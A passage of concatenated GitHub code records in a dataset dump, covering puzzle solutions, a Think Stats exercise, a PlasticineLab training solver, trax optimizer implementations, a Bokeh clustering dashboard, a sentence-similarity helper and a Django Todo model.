PriceFetcher(type_ids)\n","repo_name":"Nicksil/inventory-management","sub_path":"inventory_manager/eve/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"74458225390","text":"def load_input_file(filename: str) -> str:\n with open(filename) as f:\n out = f.read()\n return out.strip()\n\n\ndef get_unique_chars(input_string: str, length: int) -> str:\n marker = 0\n # windows of size `length` start at 0..len-length, hence the +1 bound\n for i in range(0, len(input_string) - length + 1):\n chars = set(input_string[i:i + length])\n if len(chars) == length:\n marker = i + length\n break\n return input_string[marker:marker + length]\n","repo_name":"Empiire00/advent-of-code-2022","sub_path":"day-6/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39501943423","text":"import os\nimport imageio\nimport taichi as ti\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom yacs.config import CfgNode as CN\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom plb.algorithms.logger import Logger\nfrom .optim import Optimizer\nfrom ..engine.taichi_env import TaichiEnv\nfrom ..config.utils import make_cls_config\n\nAF = {\n
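# maps activation-name strings from the config to their torch.nn.functional callables; keys must match the 'af' values used by MLP below (e.g. AF['ReLU'] is F.relu)\n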
\"Tanh\": F.tanh,\n \"ReLU\": F.relu,\n \"LeakyReLU\": F.leaky_relu\n}\n\n\nclass MLP(nn.Module):\n def __init__(self, input_dim, output_dim, hidden=(256, 256), activation=\"Tanh\"):\n super(MLP, self).__init__()\n self.af = AF[activation]\n dims = (input_dim,) + hidden + (output_dim,)\n self.linears = nn.ModuleList(\n [nn.Linear(dim, dims[i+1]) for i, dim in enumerate(dims[:-1])])\n\n def forward(self, x):\n for l in self.linears[:-1]:\n x = self.af(l(x))\n logits = self.linears[-1](x)\n logits = F.hardtanh(logits, -1., 1.)\n return logits\n\n @ classmethod\n def default_config(cls):\n cfg = CN()\n cfg.hidden = (256, 256)\n cfg.af = \"Tanh\"\n return cfg\n\n\nclass SolverTorchNN:\n def __init__(self, env, logger=None, data_dir='', **kwargs):\n self.cfg = make_cls_config(self, None, **kwargs)\n self.env = env\n self.logger = logger\n self.data_dir = data_dir\n # self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = 'cpu'\n self.nn = MLP(env.observation_space.shape[0], env.action_space.shape[0],\n hidden=self.cfg.nn.hidden, activation=self.cfg.nn.af).double().to(self.device)\n self.learning_rate = self.cfg.optim.lr\n self.optimizer = torch.optim.Adam(\n self.nn.parameters(), lr=self.learning_rate)\n\n def train(self, epoch):\n if self.logger is not None:\n self.logger.reset()\n taichi_env = self.env.unwrapped.taichi_env\n actions = []\n obs = self.env.reset()\n taichi_env.set_copy(False)\n taichi_env.set_torch_nn(self.nn)\n with ti.Tape(loss=taichi_env.loss.loss):\n for i in range(self.cfg.horizon):\n action = taichi_env.act(obs) # Need to be wrapped\n #action_np = action.data.cpu().numpy()\n obs, reward, done, loss_info = self.env.step(action)\n\n if self.logger is not None:\n self.logger.step(\n None, None, reward, None, i == self.cfg.horizon-1, loss_info)\n loss = taichi_env.loss.loss[None]\n\n self.logger.summary_writer.writer.add_histogram(\n 'output layer grad', self.nn.linears[2].weight.grad, epoch)\n\n self.optimizer.step()\n actions_np = [t.data.cpu().numpy() for t in actions]\n return loss, actions_np\n\n def solve(self, callbacks=()):\n best_actions = None\n best_model = None\n best_loss = 1e10\n for iter in range(self.cfg.n_iters):\n self.optimizer.zero_grad()\n loss, actions = self.train(iter)\n\n if loss < best_loss:\n best_loss = loss\n best_actions = actions.copy()\n best_model = self.nn.state_dict().copy()\n\n for callback in callbacks:\n callback(loss, actions)\n\n torch.save(best_model, os.path.join(\n self.data_dir, 'model_weights.pth'))\n\n self.env.reset()\n # self.logger.summary_writer.writer.add_graph(self.nn)\n self.logger.summary_writer.writer.close()\n return best_actions\n\n def inference(self):\n self.nn.load_state_dict(torch.load(\n os.path.join(self.data_dir, 'model_weights.pth')))\n self.nn.eval()\n actions = []\n obs = self.env.reset()\n for i in range(self.cfg.horizon):\n state_tensor = torch.as_tensor(obs).to(self.device)\n action_var = self.nn(state_tensor)\n actions.append(action_var)\n action_np = action_var.data.cpu().clone().numpy()\n obs, reward, done, loss_info = self.env.step(action_np)\n actions_np = [t.data.cpu().numpy() for t in actions]\n return actions_np\n\n @ classmethod\n def default_config(cls):\n cfg = CN()\n cfg.optim = Optimizer.default_config()\n cfg.nn = MLP.default_config()\n cfg.n_iters = 100\n cfg.softness = 666.\n cfg.horizon = 50\n\n return cfg\n\n\ndef solve_torch_nnv2(env, args):\n import os\n import cv2\n\n T = env._max_episode_steps\n\n nn_name = f\"nnv2_gv-{1.0}\"\n\n exp_name = 
f\"{nn_name}_{args.env_name}_horizon-{T}_hidden-{args.hidden}_lr-{args.lr}_af-{args.af}\"\n\n path = f\"data/{exp_name}/{exp_name}_s{args.seed}\"\n os.makedirs(path, exist_ok=True)\n logger = Logger(path, exp_name)\n env.reset()\n\n solver = SolverTorchNN(env, logger, data_dir=path,\n n_iters=200,\n softness=args.softness, horizon=T,\n **{\"optim.lr\": args.lr, \"nn.hidden\": args.hidden, \"nn.af\": args.af})\n\n actions = solver.solve()\n # actions = solver.inference()\n\n with imageio.get_writer(f\"{path}/output.gif\", mode=\"I\") as writer:\n for idx, act in enumerate(actions):\n _, reward, _, _ = env.step(act)\n img = env.render(mode='rgb_array')\n img = cv2.resize(img, (0, 0), fx=0.5, fy=0.5)\n writer.append_data(img)\n","repo_name":"fyp21011/PlasticineLab","sub_path":"plb/optimizer/solver_torch_nnv2.py","file_name":"solver_torch_nnv2.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"540072192","text":"\"\"\"This program runs about 1 min; the log scatter looks like a very good straight line\n\"\"\"\n\nimport math\nimport sys\nsys.path.append('..')\nimport brfss\nimport myplot\nimport sample_distribution as sd\n\ndef get_sorted_weights():\n resp = brfss.Respondents()\n resp.ReadRecords('..')\n l = [r.weight2 for r in resp.records if r.weight2 != 'NA']\n l.sort()\n return l, len(l)\n\ndef main():\n weights, n = get_sorted_weights()\n xs = sd.samples('normal', n) \n myplot.scatter(xs, weights, label='normal')\n\n log_w = [math.log(w) for w in weights]\n myplot.scatter(xs, log_w, color='red', label='log normal')\n\n myplot.show()\n\nif __name__ == '__main__':\n main()","repo_name":"lloyd-dong/lab","sub_path":"think_stats/excercise/e4_11.py","file_name":"e4_11.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"19874686605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 12 13:41:53 2021\n\n@author: gabrielpereira\n\"\"\"\n\n\n\nprint('Running check')\n\nimport math\n\n# As factors are found, the list is updated with a new \"large number\" \n# resulting from the division of the previous one by the factor found\nlarge_number = [600851475143]\n\n# Create a list to keep note of the actual divisors of large_number[0]\nsuccessful_divisors = []\n\n# Initialise the divisors to be tested\ntrial_divisor = 2\n\n\nwhile trial_divisor <= math.floor(math.sqrt(large_number[-1])):\n\n if large_number[-1] % trial_divisor == 0:\n large_number.append(large_number[-1]/trial_divisor)\n successful_divisors.append(trial_divisor)\n else:\n trial_divisor += 1 # Only here is the trial updated so that repeated (square, cube, ...) 
factors can be found\n \nprint(large_number) # Actually the largest factor is the last \"large_number\",\n# as we can't find a factor for it (it's prime), and it's larger than the last successful_divisor\nprint(successful_divisors)","repo_name":"berkpereira/project-euler","sub_path":"euler03.py","file_name":"euler03.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"43524873392","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport functools\n\nfrom tensor2tensor.trax.backend import numpy as np\nfrom tensor2tensor.trax.layers import base as layers\n\n\ndef tree_flatten(tree):\n \"\"\"Flatten a tree into a list.\"\"\"\n if isinstance(tree, (list, tuple)):\n # In python, sum of lists starting from [] is the concatenation.\n return sum([tree_flatten(t) for t in tree], [])\n if isinstance(tree, dict):\n # Only use the values in case of a dictionary node.\n return sum([tree_flatten(v) for v in tree.values()], [])\n return [tree]\n\n\ndef tree_unflatten(flat, tree):\n \"\"\"Unflatten a list into a tree given the tree shape as second argument.\n\n Args:\n flat: a flat list of elements to be assembled into a tree.\n tree: a tree with the structure we want to have in the new tree.\n\n Returns:\n A pair (new_tree, rest_of_flat) where the new tree that has the structure\n of tree but with leaves from flat, and the remaining elements of flat if\n more were provided than the number of leaves of tree (useful for recursion).\n \"\"\"\n if isinstance(tree, (list, tuple)):\n new_tree, rest = [], flat\n for t in tree:\n new_t, rest = tree_unflatten(rest, t)\n new_tree.append(new_t)\n new_tree = tuple(new_tree) if isinstance(tree, tuple) else new_tree\n return new_tree, rest\n if isinstance(tree, dict):\n new_tree, rest = {}, flat\n for k in tree:\n new_v, rest = tree_unflatten(rest, tree[k])\n new_tree[k] = new_v\n return new_tree, rest\n return flat[0], flat[1:]\n\n\nclass Optimizer(object):\n \"\"\"Optimizer object, base class. Maps per-parameter functions to trees.\"\"\"\n\n def __init__(self, learning_rate, *init_opt_params):\n \"\"\"Initialize the optimizer.\n\n Takes the initial optimizer parameters as positional arguments. They are fed\n back to the optimizer in tree_update, in the same order. They can be changed\n between updates, e.g. for learning rate schedules.\n\n The constructor should be overridden in derived classes to give names to the\n optimizer parameters, so the gin configuration can set them.\n\n Args:\n learning_rate: The initial learning rate.\n *init_opt_params: Initial values of any additional optimizer parameters.\n \"\"\"\n self._init_opt_params = tuple(\n map(np.array, (learning_rate,) + init_opt_params))\n\n def init(self, params):\n \"\"\"Create optimizer slots for the given parameters.\"\"\"\n raise NotImplementedError\n\n def update(self, step, grads, params, slots, opt_params):\n \"\"\"Update a single parameter array.\n\n Args:\n step: Current step.\n grads: Gradients.\n params: Parameters.\n slots: Optimizer slots (e.g. gradient moments).\n opt_params: Optimizer (hyper)parameters (e.g. 
learning rate, momentum).\n\n Returns:\n (new_params, new_slots)\n \"\"\"\n raise NotImplementedError\n\n # End subclass interface.\n\n def tree_init(self, param_tree):\n return (\n [self.init(param) for param in tree_flatten(param_tree)],\n self._init_opt_params,\n )\n\n def _update_and_check(self, step, grads, params, slots, opt_params):\n \"\"\"Update a single parameter array and check types.\"\"\"\n new_params, new_slots = self.update(\n step, grads, params, slots, opt_params)\n if isinstance(params, np.ndarray):\n assert isinstance(new_params, np.ndarray), (\n \"The type of the new parameter values should be np.ndarray; got %s\" %\n type(new_params))\n assert new_params.dtype == params.dtype, (\n \"The dtype of the new parameter values (%s) is not the same as the \"\n \"old one (%s)\" % (new_params.dtype, params.dtype))\n return new_params, new_slots\n\n def tree_update(self, step, grad_tree, param_tree, slots, opt_params):\n grads_flat = tree_flatten(grad_tree)\n params_flat = tree_flatten(param_tree)\n updated_pairs = [\n self._update_and_check(step, grad, param, slot, opt_params)\n for (grad, param, slot) in zip(grads_flat, params_flat, slots)\n ]\n new_params_flat, new_slots = zip(*updated_pairs)\n new_params, _ = tree_unflatten(new_params_flat, param_tree)\n return new_params, new_slots\n\n\n# Utilities.\n\n\ndef l2_norm(tree):\n \"\"\"Compute the l2 norm of a pytree of arrays. Useful for weight decay.\"\"\"\n leaves = tree_flatten(tree)\n return np.sqrt(sum(np.vdot(x, x) for x in leaves))\n\n\ndef clip_grads(grad_tree, max_norm):\n \"\"\"Clip gradients stored as a pytree of arrays to maximum norm `max_norm`.\"\"\"\n norm = l2_norm(grad_tree)\n normalize = lambda g: np.where(norm < max_norm, g, g * (max_norm / norm))\n return layers.nested_map(normalize, grad_tree)\n\n\n# Optimizers.\n\n\nclass SGD(Optimizer):\n \"\"\"Plain SGD optimizer.\"\"\"\n\n def init(self, params):\n return None\n\n def update(self, step, grads, params, slots, opt_params):\n del step\n del slots\n (learning_rate,) = opt_params\n return params - (learning_rate * grads).astype(params.dtype), None\n\n\nclass Momentum(Optimizer):\n \"\"\"Nesterov momentum optimizer.\"\"\"\n\n def __init__(self, learning_rate, mass=0.9): # pylint: disable=useless-super-delegation\n super(Momentum, self).__init__(learning_rate, mass)\n\n def init(self, params):\n return np.zeros_like(params)\n\n def update(self, step, grads, params, velocity, opt_params):\n del step\n (learning_rate, mass) = opt_params\n new_velocity = mass * velocity - (1. - mass) * grads\n new_params = params + (learning_rate * new_velocity).astype(params.dtype)\n return (new_params, new_velocity)\n\n\nclass RMSProp(Optimizer):\n \"\"\"RMSProp optimizer.\"\"\"\n\n def __init__(self, learning_rate, gamma=0.9, eps=1e-8): # pylint: disable=useless-super-delegation\n super(RMSProp, self).__init__(learning_rate, gamma, eps)\n\n def init(self, params):\n return np.ones_like(params)\n\n def update(self, step, grads, params, avg_sq_grad, opt_params):\n del step\n (learning_rate, gamma, eps) = opt_params\n avg_sq_grad = avg_sq_grad * gamma + grads**2 * (1.
- gamma)\n params = params - (learning_rate * grads /\n (np.sqrt(avg_sq_grad) + eps)).astype(params.dtype)\n return params, avg_sq_grad\n\n\nclass Adam(Optimizer):\n \"\"\"Adam optimizer.\"\"\"\n\n def __init__(self, learning_rate, b1=0.9, b2=0.999, eps=1e-8): # pylint: disable=useless-super-delegation\n \"\"\"Create the Adam optimizer.\n\n Args:\n learning_rate: a positive scalar value for the initial learning rate.\n b1: optional, a positive scalar value for beta_1, the exponential decay\n rate for the first moment estimates (default 0.9).\n b2: optional, a positive scalar value for beta_2, the exponential decay\n rate for the second moment estimates (default 0.999).\n eps: optional, a positive scalar value for epsilon, a small constant for\n numerical stability (default 1e-8).\n \"\"\"\n super(Adam, self).__init__(learning_rate, b1, b2, eps)\n\n def init(self, params):\n m = np.zeros_like(params)\n v = np.zeros_like(params)\n return m, v\n\n def update(self, step, grads, params, slots, opt_params):\n m, v = slots\n learning_rate, b1, b2, eps = opt_params\n m = (1 - b1) * grads + b1 * m # First moment estimate.\n v = (1 - b2) * (grads ** 2) + b2 * v # Second moment estimate.\n mhat = m / (1 - b1 ** (step + 1)) # Bias correction.\n vhat = v / (1 - b2 ** (step + 1))\n params = params - (\n learning_rate * mhat / (np.sqrt(vhat) + eps)).astype(params.dtype)\n return params, (m, v)\n\n\nclass Adafactor(Optimizer):\n \"\"\"Adafactor optimizer.\"\"\"\n\n # TODO(levskaya): refactor to use newer RL friendly parameter passing.\n def __init__(self,\n learning_rate,\n decay_rate=0.8,\n beta1=0.0,\n clipping_threshold=1.0,\n factored=True,\n multiply_by_parameter_scale=True,\n epsilon1=1e-30,\n epsilon2=1e-3):\n \"\"\"Create the Adafactor optimizer.\n\n Adafactor is described in https://arxiv.org/abs/1804.04235.\n\n Args:\n learning_rate: float: trax-provided learning rate.\n decay_rate: float: controls second-moment exponential decay schedule.\n beta1: a float value between 0 and 1, enables momentum and uses extra\n memory if nonzero! Off by default.\n clipping_threshold: an optional float >= 1, if None no update clipping.\n factored: boolean: whether to use factored second-moment estimator for 2d\n variables.\n multiply_by_parameter_scale: boolean: if True, then scale provided\n learning_rate by parameter norm. 
if False, provided learning_rate is\n absolute step size.\n epsilon1: Regularization constant for squared gradient.\n epsilon2: Regularization constant for parameter scale.\n \"\"\"\n super(Adafactor, self).__init__(learning_rate)\n self._multiply_by_parameter_scale = multiply_by_parameter_scale\n self._factored = factored\n self._beta1 = beta1\n self._clipping_threshold = clipping_threshold\n self._epsilon1 = epsilon1\n self._epsilon2 = epsilon2\n self._decay_rate = functools.partial(self._decay_rate_pow,\n exponent=decay_rate)\n\n @staticmethod\n def _decay_rate_pow(i, exponent=0.8):\n \"\"\"Default Adafactor second-moment decay schedule.\"\"\"\n t = np.array(i, np.float32) + 1.0\n return 1.0 - t**(-exponent)\n\n def init(self, params):\n shape = params.shape\n slots = []\n if self._factored and len(shape) >= 2:\n v_row = np.zeros(shape[:-1], dtype=np.float32)\n v_col = np.zeros(shape[:-2] + shape[-1:], dtype=np.float32)\n slots.extend([v_row, v_col])\n else:\n v = np.zeros_like(params)\n slots.append(v)\n if self._beta1:\n m = np.zeros_like(params)\n slots.append(m)\n return slots\n\n def update(self, step, grads, params, slots, opt_params):\n updates = []\n (learning_rate,) = opt_params\n decay_rate = self._decay_rate(step)\n update_scale = learning_rate\n if self._multiply_by_parameter_scale:\n update_scale *= np.maximum(\n np.sqrt(np.mean(params * params)), self._epsilon2)\n mixing_rate = 1.0 - decay_rate\n\n grads_sqr = grads * grads + self._epsilon1\n if self._factored and len(params.shape) >= 2:\n v_row = slots.pop(0)\n v_col = slots.pop(0)\n new_v_row = decay_rate * v_row + mixing_rate * np.mean(grads_sqr, axis=-1)\n new_v_col = decay_rate * v_col + mixing_rate * np.mean(grads_sqr, axis=-2)\n updates.extend([new_v_row, new_v_col])\n row_col_mean = np.mean(new_v_row, axis=-1, keepdims=True)\n row_factor = (new_v_row / row_col_mean)**-0.5\n col_factor = (new_v_col)**-0.5\n y = (\n grads * np.expand_dims(row_factor, axis=-1) *\n np.expand_dims(col_factor, axis=-2))\n else:\n v = slots.pop(0)\n new_v = decay_rate * v + mixing_rate * grads_sqr\n updates.append(new_v)\n y = grads * (new_v)**-0.5\n\n if self._clipping_threshold:\n clipping_denom = (\n np.maximum(1.0,\n np.sqrt(np.mean(y * y)) / self._clipping_threshold))\n y /= clipping_denom\n\n subtrahend = update_scale * y\n if self._beta1:\n m = slots.pop(0)\n new_m = self._beta1 * m + (1.0 - self._beta1) * subtrahend\n subtrahend = new_m\n updates.append(new_m)\n\n new_params = params - subtrahend\n return new_params, updates\n\n\nclass SM3(Optimizer):\n \"\"\"SM3 optimizer.\"\"\"\n\n def __init__(self, learning_rate, momentum=0.9): # pylint: disable=useless-super-delegation\n \"\"\"Create the SM3 optimizer.\n\n Memory-Efficient Adaptive Optimization for Large-Scale Learning.\n https://arxiv.org/abs/1901.11150\n\n Args:\n learning_rate: a positive scalar value for the initial learning rate.\n momentum: optional, a positive scalar value for momentum\n \"\"\"\n super(SM3, self).__init__(learning_rate, momentum)\n\n def init(self, params):\n vs = [np.zeros(sz, dtype=params.dtype) for sz in params.shape]\n return (np.zeros_like(params), vs)\n\n def _update_diagonal(self, grads, params, m, v, opt_params):\n (learning_rate, momentum) = opt_params\n v[0] += grads * grads\n preconditioner = np.where(v[0] > 0, 1.0 / np.sqrt(v[0]),\n np.zeros_like(v[0]))\n preconditioned_grads = preconditioner * grads\n m = (1 - momentum) * preconditioned_grads + momentum * m\n params = params - (learning_rate * m).astype(params.dtype)\n return params, (m, 
v)\n\n def _expanded_shape(self, shape, axis):\n # Replaces a `shape` of [M, N, K] with 1 in all dimensions except for i.\n # For eg: i = 1 returns [1, N, 1].\n rank = len(shape)\n return [1] * axis + [shape[axis]] + [1] * (rank - axis - 1)\n\n def _minimum(self, tensor_list):\n minimum = tensor_list[0]\n for i in range(1, len(tensor_list)):\n minimum = np.minimum(minimum, tensor_list[i])\n return minimum\n\n def _update_sketched(self, grads, params, m, v, opt_params):\n \"\"\"Update for higher-rank parameters.\"\"\"\n (learning_rate, momentum) = opt_params\n shape = params.shape\n rank = len(shape)\n reshaped_accumulators = [np.reshape(v[i], self._expanded_shape(shape, i))\n for i in range(rank)]\n current_accumulator = self._minimum(reshaped_accumulators)\n current_accumulator += grads * grads\n accumulator_inv_sqrt = np.where(current_accumulator > 0.0,\n 1.0 / np.sqrt(current_accumulator),\n np.zeros_like(current_accumulator))\n preconditioned_gradient = grads * accumulator_inv_sqrt\n m = (1.0 - momentum) * preconditioned_gradient + momentum * m\n params = params - (learning_rate * m).astype(params.dtype)\n for i in range(len(v)):\n axes = list(range(int(i))) + list(range(int(i) + 1, rank))\n dim_accumulator = np.amax(current_accumulator, axis=axes)\n v[i] = dim_accumulator\n return params, (m, v)\n\n def update(self, step, grads, params, slots, opt_params):\n del step\n m, v = slots\n shape = params.shape\n rank = len(shape)\n if rank > 1:\n return self._update_sketched(grads, params, m, v, opt_params)\n else:\n return self._update_diagonal(grads, params, m, v, opt_params)\n","repo_name":"SannyZhou/GEC-t2t","sub_path":"tensor2tensor/trax/optimizers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14179,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"41289841098","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\nimport pandas as pd\nfrom os.path import dirname, join\nfrom bokeh.io import curdoc\nfrom bokeh.plotting import figure\nfrom bokeh.models import (\n ColumnDataSource, Slider, NumeralTickFormatter, HoverTool\n)\nfrom bokeh.layouts import column, row, widgetbox\nfrom bokeh.models.widgets import (\n Select, Div, Panel, Tabs, NumberFormatter\n)\nfrom sklearn.cluster import KMeans, SpectralClustering\n\n\ndef nix(val, lst):\n return [x for x in lst if x != val]\n\ndef get_data(t1, t2, alg, reg, clusters):\n \"\"\" Get the data according to user's settings.\n\n Args:\n t1: the selected column for x axis\n t2: the selected column for y axis\n alg: the clustering algorithm\n reg: the region for filtered plot\n clusters: the number of clusters for the clustering algorithm\n\n \"\"\"\n \n # Run K-means clustering\n if alg == METHODS[0]:\n labels, centroids = run_Kmeans(data, clusters)\n\n # For K-means clustering, plot the centroid of each cluster\n number = ['Cluster ' + str(i+1) for i in range(clusters)]\n x = [coord[columns.index(t1)] for coord in centroids]\n y = [coord[columns.index(t2)] for coord in centroids]\n d3 = dict(index=number, x=x, y=y, color=COLORS[:clusters])\n \n # Run Spectral clustering\n elif alg == METHODS[1]:\n # Run the normalized data for the affinity matrix\n labels = run_SpectralClustering(data_norm, clusters)\n d3 = dict(index=[], x=[], y=[], color=[])\n\n indices = list(df.index)\n colors = [COLORS[x] for x in labels]\n d1 = dict(index=indices, x=df[t1], y=df[t2], color=colors)\n\n region_df = df.loc[lambda df: df.Region == int(reg), :]\n region_indices = 
list(region_df.index)\n region_colors = [colors[x] for x in region_indices]\n d2 = dict(index=region_indices, x=region_df[t1], y=region_df[t2], color=region_colors)\n\n return d1, d2, d3\n\ndef run_Kmeans(data, clusters):\n estimator = KMeans(n_clusters=clusters, random_state=0).fit(data)\n return estimator.labels_, estimator.cluster_centers_\n\ndef run_SpectralClustering(data, clusters):\n estimator = SpectralClustering(n_clusters=clusters).fit(data)\n return estimator.labels_\n\n\n# Read in dataset\ndf = pd.read_csv(join(dirname(__file__), 'data/Wholesale customers data.csv'))\ncolumns = sorted(df.columns[2:])\ndata = df[columns].as_matrix()\n\n# Normalize each column (for Spectral Clustering)\ndf_norm = (df - df.min()) / (df.max() - df.min())\ndata_norm = df_norm[columns].as_matrix()\n\n# Set the DataSource for the plots\ns1 = ColumnDataSource(data=dict(index=[], x=[], y=[], color=[]))\ns2 = ColumnDataSource(data=dict(index=[], x=[], y=[], color=[]))\ns3 = ColumnDataSource(data=dict(index=[], x=[], y=[], color=[]))\n\n\n# Default settings\nDEFAULT_TICKERS = columns\nMETHODS = ['K-means', 'Spectral']\nDEFAULT_TOOLS = ['pan', 'box_zoom', 'reset']\nCOLORS = ['#ae254a', '#007380', '#4364ae', '#f9d500',\n '#ff7256', '#800080', '#0e2f44', '#f442cb']\nPLOT_PARAM = {'plot_height': 400, 'plot_width': 600, 'responsive': True,\n 'toolbar_location': 'above', 'tools': DEFAULT_TOOLS}\n\n# Draw an interactive scatter plot to show the data distribution\np1 = figure(**PLOT_PARAM)\np1.circle('x', 'y', source=s1, size=12, color='color', alpha=0.6)\np1.circle_x('x', 'y', source=s3, size=20, color='color', fill_alpha=1.0, line_color='black', line_width=2)\np1.title.text_font_size='16px'\np1.xaxis.formatter=p1.yaxis.formatter=NumeralTickFormatter(format='$ 0,0')\n\np2 = figure(x_range=p1.x_range, y_range=p1.y_range, **PLOT_PARAM)\np2.circle('x', 'y', source=s2, size=12, color='color', alpha=0.6)\np2.title.text_font_size='16px'\np2.xaxis.formatter=p2.yaxis.formatter=NumeralTickFormatter(format='$ 0,0')\n\n# Add a hover tool to the scatter plot\nhover = HoverTool(\n tooltips=[\n ('Index: ', '@index'),\n ('x: ', '@x{$ 0,0}'),\n ('y: ', '@y{$ 0,0}')\n ]\n)\np1.add_tools(hover)\np2.add_tools(hover)\n\n\n# Set up widgets\nx_ticker = Select(title='X Axis:', value='Milk', options=nix('Fresh', DEFAULT_TICKERS))\ny_ticker = Select(title='Y Axis:', value='Fresh', options=nix('Milk', DEFAULT_TICKERS))\nalg_ticker = Select(title='Clustering:', value='K-means', options=METHODS)\nreg_ticker = Select(title='Region:', value='1', options=['1', '2', '3'])\ncluster_slider = Slider(title='Clusters', value=4, start=1, end=8, step=1)\n\n\n# Set up callbacks\ndef x_ticker_change(attrname, old, new):\n y_ticker.options = nix(new, DEFAULT_TICKERS)\n update()\n\ndef y_ticker_change(attrname, old, new):\n x_ticker.options = nix(new, DEFAULT_TICKERS)\n update()\n\ndef setting_change(attrname, old, new):\n update()\n\ndef update():\n t1, t2, t3, t4 = x_ticker.value, y_ticker.value, alg_ticker.value, reg_ticker.value\n clusters = cluster_slider.value\n\n s1.data, s2.data, s3.data = get_data(t1, t2, t3, t4, clusters)\n p1.xaxis.axis_label = p2.xaxis.axis_label = t1 + ' (m.u.)'\n p1.yaxis.axis_label = p2.yaxis.axis_label = t2 + ' (m.u.)'\n p1.title.text = '%s vs. 
%s' % (t1, t2)\n p2.title.text = 'Region {} only'.format(t4)\n\n\nx_ticker.on_change('value', x_ticker_change)\ny_ticker.on_change('value', y_ticker_change)\nalg_ticker.on_change('value', setting_change)\nreg_ticker.on_change('value', setting_change)\ncluster_slider.on_change('value', setting_change)\n\n\n# Set up layout\ndesc = Div(text=open(join(dirname(__file__), 'description.html')).read(), width=700, height=120)\ntickers = widgetbox(x_ticker, y_ticker, alg_ticker)\np1_widget = row(p1, column(tickers, cluster_slider))\np2_widget = row(p2, reg_ticker)\nscatter_widget = column(p1_widget, p2_widget)\ntab1 = Panel(child=scatter_widget, title='Scatter')\ntabs = Tabs(tabs=[tab1])\nlayout = column(desc, tabs)\n\n\n# Initialize\nupdate()\n\ncurdoc().add_root(layout)\ncurdoc().title = 'Wholesale Customers'\n","repo_name":"DerekChiangTW/CS690V-Visual-Analytics","sub_path":"HW3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42812209008","text":"# Importing Libraries\nfrom nltk.cluster.util import cosine_distance\nimport numpy as np\n\n# Function to identify how similar two sentences are\ndef sentence_similarity(sent1, sent2, stopwords=None):\n if stopwords is None:\n stopwords = []\n \n sent1 = [w.lower() for w in sent1]\n sent2 = [w.lower() for w in sent2]\n \n all_words = list(set(sent1 + sent2))\n \n vector1 = [0] * len(all_words)\n vector2 = [0] * len(all_words)\n \n # build the vector for the first sentence\n for w in sent1:\n if w in stopwords:\n continue\n vector1[all_words.index(w)] += 1\n \n # build the vector for the second sentence\n for w in sent2:\n if w in stopwords:\n continue\n vector2[all_words.index(w)] += 1\n \n return 1 - cosine_distance(vector1, vector2)\n\n# Function to build similarity matrix for the given text file\ndef build_similarity_matrix(sentences, stop_words):\n # Create an empty similarity matrix\n similarity_matrix = np.zeros((len(sentences), len(sentences)))\n \n for idx1 in range(len(sentences)):\n for idx2 in range(len(sentences)):\n if idx1 == idx2: #ignore if both are same sentences\n continue \n similarity_matrix[idx1][idx2] = sentence_similarity(sentences[idx1], sentences[idx2], stop_words)\n\n return similarity_matrix","repo_name":"JayeshLocharla/18CSC305J-Artificial-Intelligence-Project","sub_path":"utilities/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"12427459266","text":"from django.db import models\n\nclass Todo(models.Model):\n body = models.CharField(max_length=300)\n created = models.DateTimeField(auto_now_add=True)\n description = models.TextField(blank=True)\n attachment = models.FileField(upload_to='attachments/', null=True, blank=True)\n due_datetime = models.DateTimeField(null=True, blank=True)\n is_completed = models.BooleanField(default=False)\n related_url = models.URLField(blank=True)\n color = models.CharField(max_length=10, blank=True)\n parent = models.ForeignKey('self', on_delete=models.CASCADE, null=True, blank=True)\n repeat_period = models.CharField(max_length=20, blank=True)\n viewed = models.BooleanField(default=False)\n priority = models.PositiveIntegerField(default=1)\n location = models.URLField(blank=True)\n \n def __str__(self):\n return f\"{self.body} - {self.created.strftime('%H:%M %d %B')}\" # display the created field in a custom format\n \n class Meta:\n
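# Meta holds model-level options; the ordering below becomes the default for every Todo queryset\n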
